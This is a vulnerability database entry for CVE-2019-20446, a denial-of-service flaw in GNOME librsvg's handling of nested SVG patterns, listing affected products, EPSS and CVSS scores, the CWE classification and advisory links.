Vulnerability Details : CVE-2019-20446
In xml.rs in GNOME librsvg before 2.46.2, a crafted SVG file with nested patterns can cause denial of service when passed to the library for processing. The attacker constructs pattern elements so that the number of final rendered objects grows exponentially.
Vulnerability category: Denial of service
Products affected by CVE-2019-20446
- cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
- cpe:2.3:a:gnome:librsvg:*:*:*:*:*:*:*:*
- cpe:2.3:a:gnome:librsvg:*:*:*:*:*:*:*:*
- cpe:2.3:a:gnome:librsvg:*:*:*:*:*:*:*:*
- cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*
- cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*
- cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
- cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*
- cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
- cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*
Exploit prediction scoring system (EPSS) score for CVE-2019-20446
0.39%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 73 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2019-20446
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
4.3
|
MEDIUM | AV:N/AC:M/Au:N/C:N/I:N/A:P |
8.6
|
2.9
|
NIST | |
6.5
|
MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H |
2.8
|
3.6
|
NIST |
CWE ids for CVE-2019-20446
-
The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.Assigned by: nvd@nist.gov (Primary)
References for CVE-2019-20446
-
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6IOHSO6BUKC6I66J5PZOMAGFVJ66ZS57/
[SECURITY] Fedora 30 Update: chromium-80.0.3987.149-1.fc30 - package-announce - Fedora Mailing-ListsMailing List;Third Party Advisory
-
https://gitlab.gnome.org/GNOME/librsvg/issues/515
DoS vulnerability in librsvg (#515) · Issues · GNOME / librsvg · GitLabVendor Advisory
-
http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00024.html
[security-announce] openSUSE-SU-2020:0343-1: moderate: Security update fMailing List;Third Party Advisory
-
https://security.netapp.com/advisory/ntap-20221111-0004/
CVE-2019-20446 GNOME Librsvg Vulnerability in NetApp Products | NetApp Product SecurityThird Party Advisory
-
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X3B5RWJQD5LA45MYLLR55KZJOJ5NVZGP/
[SECURITY] Fedora 31 Update: chromium-80.0.3987.132-1.fc31 - package-announce - Fedora Mailing-ListsMailing List;Third Party Advisory
-
https://usn.ubuntu.com/4436-1/
USN-4436-1: librsvg vulnerabilities | Ubuntu security notices | UbuntuThird Party Advisory
-
https://lists.debian.org/debian-lts-announce/2020/07/msg00016.html
[SECURITY] [DLA 2285-1] librsvg security updateMailing List;Third Party Advisory
Jump to